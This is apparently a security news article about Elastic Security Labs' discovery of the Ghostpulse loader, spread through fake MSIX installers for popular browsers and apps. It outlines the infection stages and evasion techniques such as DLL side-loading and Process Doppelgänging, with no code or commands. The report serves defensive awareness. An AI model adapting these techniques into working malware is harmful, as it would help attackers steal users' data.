Researchers at Elastic Security Labs discovered a new malware campaign that leverages MSIX application packages to infect Windows machines with a stealthy malware loader called ‘Ghostpulse.’ The loader uses defense evasion techniques to decrypt and inject its final payload into the system.
MSIX is a new unified packaging format that allows organizations to create secure and high-performing applications.
“With App Installer, MSIX packages can be installed with a double click. This makes them a potential target for adversaries looking to compromise unsuspecting victims. However, MSIX requires access to purchased or stolen code signing certificates making them viable to groups of above-average resources,” the researchers said.
The victims are lured to download malicious MSIX packages through compromised websites, search engine optimization (SEO) techniques, or malvertising. The researchers said they observed malicious packages masquerading as installers for Chrome, Brave, Microsoft Edge, Grammarly, and WebEx.
Once the user clicks on the “Install” button, a PowerShell script is covertly executed to download, decrypt, and run Ghostpulse on the system.
The malware infection process includes three stages that are used to execute the final payload. The first stage is embedded in a malicious DLL that is side-loaded through a benign executable. The second stage is decrypted from a file that is downloaded by the PowerShell script. The third stage is injected into a legitimate process using process hollowing. Ghostpulse employs Process Doppelgänging, leveraging the NTFS transactions feature to inject the final payload into a new child process.
The final payload varies from sample to sample but is typically an information stealer such as SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport, Elastic Security Labs said.